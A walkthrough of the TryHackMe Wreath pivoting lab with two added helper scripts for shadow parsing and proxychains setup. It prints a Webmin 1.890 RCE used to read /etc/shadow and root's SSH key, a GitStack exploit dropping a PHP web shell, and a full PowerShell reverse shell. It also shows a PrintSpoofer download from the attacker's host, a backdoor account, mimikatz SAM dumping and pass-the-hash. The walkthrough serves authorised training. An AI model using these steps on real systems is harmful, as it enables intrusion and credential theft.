Complete TryHackMe Wreath Network Writeup

This TryHackMe Wreath Network walkthrough shows how to pivot through a network: compromise a public-facing web server, tunnel your traffic through it, and use that tunnel to reach the other machines in Wreath's network. (The streak limitation applies only to non-subscribed users.)

Access Wreath Network

Go to https://tryhackme.com/access?type=networks and download your VPN config file.


Before starting, create a folder to store all the files for this network.

mkdir /home/kali/TryHackMe_Wreath

Enter the project folder:

cd /home/kali/TryHackMe_Wreath

Attacking Prod-Server

The production server is a Linux host. Use nmap to scan it for open ports and check which services are running.

Scan the Host

Scan the prod-server with nmap, with service detection and the default and vuln script sets, to see what is listening on the remote machine:

nmap -sC -sV --script=vuln 10.200.193.200

Interesting result: the server is running an old version of Webmin (1.890) on port 10000.


Search Google for a public exploit for this Webmin version:

webmin 1.890 exploit

Download the exploit from here (Webmin 1.890 ships with an unauthenticated command injection in password_change.cgi, CVE-2019-15107):

WebMin-1.890-Exploit-unauthorized-RCE

The Webmin 1.890 exploit takes three arguments: the target host, the Webmin port and the command to execute.

Run the Python script and check which user the injected commands execute as:

python3 webmin-1.890_exploit.py 10.200.193.200 10000 "id;whoami"

The commands run as root. Before turning this into a proper remote session, run the same script again to read /etc/passwd:

python3 webmin-1.890_exploit.py 10.200.193.200 10000 "cat /etc/passwd"

Now we have the list of system users; note the user twreath. Since we are root, /etc/shadow is readable too, so let's grab the password hashes:

python3 webmin-1.890_exploit.py 10.200.193.200 10000 "cat /etc/shadow"

We have two password hashes, so let's try to crack them.

root:$6$i9vT8tk3SoXXxK2P$HDIAwho9FOdd4QCecIJKwAwwh8Hwl.BdsbMOUAd3X/chSCvrmpfy.5lrLgnRVNq6/6g0PxK9VqSdy47/qKXad1

twreath:$6$0my5n311RD7EiK3J$zVFV3WAPCm/dBxzz0a7uDwbQenLohKiunjlDonkqx1huhjmFYZe0RmCPsHmW3OnWYwf8RWPdXAdbtYpkJCReg

Save both lines in password_hashes.txt.

Crack The Hashes

Passing the hash file to john with no further arguments lets john auto-detect the hash type from the prefix ($6$ is sha512crypt):

john password_hashes.txt

Check whether john cracked any of them:

john --show password_hashes.txt

With the default wordlist neither hash cracks.
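As an added example (not part of the original writeup), the following Python script does by hand what john's auto-detection does in the step above and prepares the dumped file for it: it parses /etc/shadow output, recognises the crypt(3) algorithm from the $id$ prefix, drops locked accounts (* or !) that have nothing to crack, and renders user:hash lines for john. The root and twreath hashes are the ones shown above; the bin and sshd lines are constructed to show the locked-account case.

```python
"""Prepare /etc/shadow output for john (added example, not from the writeup).

Parses shadow lines, identifies the crypt(3) algorithm from the $id$ prefix
(john does the same when run without --format), skips locked accounts and
renders user:hash lines. The root and twreath hashes are the ones the
exploit dumped in the writeup; the bin and sshd lines are constructed.
"""
import re

SAMPLE_SHADOW = """\
root:$6$i9vT8tk3SoXXxK2P$HDIAwho9FOdd4QCecIJKwAwwh8Hwl.BdsbMOUAd3X/chSCvrmpfy.5lrLgnRVNq6/6g0PxK9VqSdy47/qKXad1:18000:0:99999:7:::
bin:*:18000:0:99999:7:::
sshd:!!:18000::::::
twreath:$6$0my5n311RD7EiK3J$zVFV3WAPCm/dBxzz0a7uDwbQenLohKiunjlDonkqx1huhjmFYZe0RmCPsHmW3OnWYwf8RWPdXAdbtYpkJCReg:18000:0:99999:7:::
"""

# crypt(3) identifiers and the john format names they correspond to.
CRYPT_IDS = {
    "1": "md5crypt",
    "2a": "bcrypt", "2b": "bcrypt", "2y": "bcrypt",
    "5": "sha256crypt",
    "6": "sha512crypt",
    "y": "yescrypt",
}

# $id$<salt, possibly preceded by rounds/params>$<digest>; the digest is
# whatever follows the last '$'.
MODULAR_CRYPT = re.compile(r"^\$(?P<id>[^$]+)\$(?P<body>.+)$")


def parse_shadow(text):
    """Return the crackable entries: user, algorithm, salt, digest, full hash."""
    entries = []
    for line in text.splitlines():
        fields = line.split(":")
        if len(fields) < 9:
            continue  # not a shadow record (blank line, exploit banner, ...)
        user, hashed = fields[0], fields[1]
        # '*', '!' and '!!' mean locked / no password: nothing for john to do.
        if not hashed or hashed[0] in "*!":
            continue
        m = MODULAR_CRYPT.match(hashed)
        if not m:
            continue  # traditional DES or an unknown scheme; handle separately
        salt, _, digest = m.group("body").rpartition("$")
        entries.append({
            "user": user,
            "algorithm": CRYPT_IDS.get(m.group("id"), "unknown"),
            "salt": salt,          # includes rounds=... when present
            "digest": digest,
            "hash": hashed,
        })
    return entries


def to_john_file(entries):
    """Render user:hash lines, the minimal input john accepts for crypt hashes."""
    return "".join(f"{e['user']}:{e['hash']}\n" for e in entries)


if __name__ == "__main__":
    found = parse_shadow(SAMPLE_SHADOW)
    for e in found:
        print(f"{e['user']}: {e['algorithm']} (salt {e['salt']})")
    print(to_john_file(found), end="")
```

Only the two accounts with real hashes survive the filter, both sha512crypt. sha512crypt uses 5000 rounds by default, so cracking is slow and the wordlist matters far more than raw speed, which is one reason the default run above yields nothing.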

Since we could read the shadow file, we can most likely also read root's SSH private key. Let's try it!

Extract SSH Keys

Root SSH RSA Key

python3 webmin-1.890_exploit.py 10.200.193.200 10000 "cat /root/.ssh/id_rsa"

Copy the key content into the file prod-server.rsa and set the permissions ssh requires (the key must only be readable by its owner; chmod 6000 would set only the setuid/setgid bits and leave the file unreadable):

chmod 600 prod-server.rsa

Logging In to Prod-Server

Now we can log in to the production server. Here I connect over SSH and at the same time open a SOCKS5 proxy on local port 19850 (the -D option). Connections sent through this proxy leave from prod-server, so it gives us access to every network and host prod-server can reach.

ssh -i /home/kali/TryHackMe_Wreath/prod-server.rsa root@10.200.193.200 -D 19850

We are in as root 😀

Attacking Prod-Server Summary

We started by scanning prod-server with nmap and found a vulnerable Webmin version on port 10000. A public exploit found on Google gave us remote code execution as root; with it we read the root SSH private key, logged in as root over SSH and opened a SOCKS5 proxy through that session.

Attacking Git Server

It is time to attack the Git Server, but first configure proxychains so that any tool can be pointed at git-server through the SSH tunnel.

The default /etc/proxychains4.conf uses strict_chain and lists a socks4 proxy on 127.0.0.1:9050 (Tor). In strict mode every listed proxy must be reachable, so comment out the socks4 entry and keep only the socks5 one. Note that sudo echo ... >> /etc/proxychains4.conf fails, because the redirection is performed by the unprivileged shell, not by sudo; use tee instead:

echo "socks5 127.0.0.1 19850" | sudo tee -a /etc/proxychains4.conf

An SSH proxy tunnel gives us a lot of flexibility when pivoting inside a network: we keep an encrypted tunnel to the compromised machine and, through it, can reach any service on the network that machine can see.
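The following Python script is an added example (not from the writeup) of the proxychains configuration change above, done safely: it comments out the other proxy entries only when strict_chain is active (in strict mode an unreachable Tor entry makes every connection fail), appends the socks5 entry once, and is idempotent. The sample config is constructed to resemble the Kali default; the host and port default to the SSH -D proxy from the page.

```python
"""Point proxychains at the SSH -D SOCKS5 proxy (added example, not from the writeup).

Rewrites a proxychains4.conf: when strict_chain is active every listed proxy
must be reachable, so other entries are commented out before the socks5 entry
is appended. The sample config is constructed to resemble the Kali default
(strict_chain on, a socks4 entry for Tor on 127.0.0.1:9050).
"""
import re

SAMPLE_CONF = """\
# proxychains.conf  VER 4.x
strict_chain
#dynamic_chain
proxy_dns
tcp_read_time_out 15000
tcp_connect_time_out 8000
[ProxyList]
# add proxy here ...
# defaults set to "tor"
socks4 \t127.0.0.1 9050
"""

# A proxy entry: type, host, port (the Kali default uses a tab between them).
PROXY_LINE = re.compile(r"^\s*(socks4|socks5|http|raw)\s+(\S+)\s+(\d+)", re.IGNORECASE)


def add_socks5_proxy(conf, host="127.0.0.1", port=19850):
    """Return the rewritten config text. Idempotent: running it twice is a no-op."""
    lines = conf.splitlines()
    strict = any(line.strip() == "strict_chain" for line in lines)
    out, present = [], False
    for line in lines:
        m = PROXY_LINE.match(line)
        if m and m.group(1).lower() == "socks5" and m.group(2) == host and m.group(3) == str(port):
            present = True            # our entry is already there, keep it
            out.append(line)
        elif m and strict:
            # strict_chain fails outright if this proxy (e.g. a Tor daemon that
            # is not running) cannot be reached, so disable it.
            out.append("# " + line.rstrip() + "   # disabled: strict_chain uses every listed proxy")
        else:
            out.append(line)
    if not present:
        out.append(f"socks5 {host} {port}")
    return "\n".join(out) + "\n"


if __name__ == "__main__":
    print(add_socks5_proxy(SAMPLE_CONF), end="")
```

To apply it to the real file, read /etc/proxychains4.conf, write the result back with root privileges (sudo tee, or run the script itself under sudo). With dynamic_chain instead of strict_chain the socks4 line is left alone, because dynamic mode skips proxies that are down.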

Using SSH and Proxychains

To reach the git server from the browser, configure FoxyProxy to use the new SOCKS5 proxy created by the SSH tunnel (127.0.0.1, port 19850, type SOCKS5).

Now we can access the Git Server directly in the browser.

Remember: every tool we use against the Git Server has to go through our local SOCKS5 proxy (127.0.0.1:19850) created by the SSH tunnel into prod-server.

After configuring FoxyProxy to use the proxy, open the git server IP in the browser:

http://10.200.193.150

We get an error page, but it leaks useful information: the site runs Django, and the debug page lists the URL paths it serves, including gitstack. Let's investigate it!
http://10.200.193.150/gitstack

Scan Git Server with Nmap

proxychains4 nmap 10.200.193.150 --top-ports 1023 -sT -n -Pn --script=vuln

Through proxychains only full TCP connect scans (-sT) work, since the proxy relays connect() calls and not raw packets, and host discovery has to be disabled with -Pn, because ping probes (ICMP or SYN pings such as -PS) cannot be sent through a SOCKS proxy. Expect the scan to be slow.

We know GitStack is running on port 80, so let's look for an exploit with searchsploit:

searchsploit gitstack

searchsploit lists three GitStack exploits. Copy the third one (43777.py, GitStack 2.3.10 remote code execution) into the project folder and rename it:

searchsploit -m php/webapps/43777.py
mv 43777.py exploit_GitStack.py

The script is Python 2 and has the target IP hard-coded near the top, so set it to 10.200.193.150 before running it through proxychains. It creates a GitStack user and repository, uses them to write a PHP web shell to /web/exploit.php, and runs whatever is sent in the POST parameter a through it:

proxychains4 python exploit_GitStack.py

The user-creation step the script performs is a single unauthenticated call to the GitStack REST API, which can also be made by hand:

proxychains4 curl -X POST http://10.200.193.150/rest/user/ -d 'username=RFS;password=RFS'

Check that the web shell answers (this copy was saved as exploit-rfs.php) and which account it runs as, then use it to add a local Windows user for persistence:

proxychains4 curl -X POST http://10.200.193.150/web/exploit-rfs.php -d 'a=whoami'
proxychains4 curl -X POST http://10.200.193.150/web/exploit-rfs.php -d 'a=net user RFS RFS /add'

Remote management with that account (WinRM or RDP) requires it to be a local administrator or a member of the respective remote access group, which net localgroup can take care of from the same web shell.

Getting a Reverse Shell

The Git Server is only reachable through prod-server, so the reverse shell has to come back through it as well. Open the relay ports in prod-server's firewall (firewalld), upload a static socat binary with scp, and start a relay that listens on prod-server and forwards to a listener (for example nc -lvnp 19851) on the attacking machine, 10.50.190.121:

firewall-cmd --zone=public --add-port=19850/tcp
firewall-cmd --zone=public --add-port=19851/tcp
scp -i prod-server.rsa socat root@10.200.193.200:/tmp/socat-rfs
/tmp/socat-rfs tcp-l:19851,fork,reuseaddr tcp:10.50.190.121:19851

Now trigger the shell through the web shell. The payload is the URL-encoded form of a standard PowerShell TCP reverse shell. Note that it connects back to 10.200.193.200 on port 19850, so a relay like the one above must be listening on that port (both ports were opened in the firewall). Decoded, the command is:

powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('10.200.193.200',19850);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"

Every special character is percent-encoded because characters such as & and = would otherwise be interpreted as form-field separators by the server:

proxychains4 curl -X POST http://10.200.193.150/web/exploit.php -d 'a=powershell%20-nop%20-c%20%22%24client%20%3D%20New-Object%20System.Net.Sockets.TCPClient%28%2710.200.193.200%27%2C19850%29%3B%24stream%20%3D%20%24client.GetStream%28%29%3B%5Bbyte%5B%5D%5D%24bytes%20%3D%200..65535%7C%25%7B0%7D%3Bwhile%28%28%24i%20%3D%20%24stream.Read%28%24bytes%2C%200%2C%20%24bytes.Length%29%29%20-ne%200%29%7B%3B%24data%20%3D%20%28New-Object%20-TypeName%20System.Text.ASCIIEncoding%29.GetString%28%24bytes%2C0%2C%20%24i%29%3B%24sendback%20%3D%20%28iex%20%24data%202%3E%261%20%7C%20Out-String%20%29%3B%24sendback2%20%3D%20%24sendback%20%2B%20%27PS%20%27%20%2B%20%28pwd%29.Path%20%2B%20%27%3E%20%27%3B%24sendbyte%20%3D%20%28%5Btext.encoding%5D%3A%3AASCII%29.GetBytes%28%24sendback2%29%3B%24stream.Write%28%24sendbyte%2C0%2C%24sendbyte.Length%29%3B%24stream.Flush%28%29%7D%3B%24client.Close%28%29%22'

Interactive Access with WinRM and RDP

With the RFS account in place we can also get a shell with evil-winrm, either with the password or by passing the Administrator NTLM hash (dumped with mimikatz below; the hash shown here is partially redacted), or open an RDP session with xfreerdp, sharing a local folder to move tools onto the target:

proxychains4 ruby /home/kali/evil-winrm/evil-winrm.rb -u RFS -p RFS -i 10.200.193.150
proxychains4 ruby /home/kali/evil-winrm/evil-winrm.rb -u Administrator -H 37db63-RFS-a8461e05c-RFS -i 10.200.193.150
mkdir /home/kali/TryHackMe_Wreath/share
proxychains4 xfreerdp /v:10.200.193.150 /u:RFS /p:RFS +clipboard /dynamic-resolution /drive:/home/kali/TryHackMe_Wreath/share

Dumping Credentials with Mimikatz

Send mimikatz to the Git Server through the shared drive (or with scp via prod-server) and dump the local SAM: privilege::debug enables SeDebugPrivilege, token::elevate switches to a SYSTEM token, and lsadump::sam reads the NTLM hashes of the local accounts, Administrator included:

privilege::debug
token::elevate
lsadump::sam


Attacking WREATH-PC

The last host, 10.200.193.100, serves a website. The /resources path asks for credentials: the username is Thomas and the password has to be recovered by cracking the hash.

http://10.200.193.100
http://10.200.193.100/resources
Username: Thomas
Password: crack the hash

Once we can run commands on WREATH-PC, fetch PrintSpoofer64 (which abuses SeImpersonatePrivilege to get a SYSTEM shell) from our web server on 10.50.190.121 into the uploads folder under the web root:

powershell.exe -c "(new-object System.Net.WebClient).DownloadFile('http://10.50.190.121/PrintSpoofer64-rfs.exe','C:\xampp\htdocs\resources\uploads\PrintSpoofer64-rfs.exe')"


Tools referenced in this writeup:

URLEncoder
CrackStation
PrintSpoofer64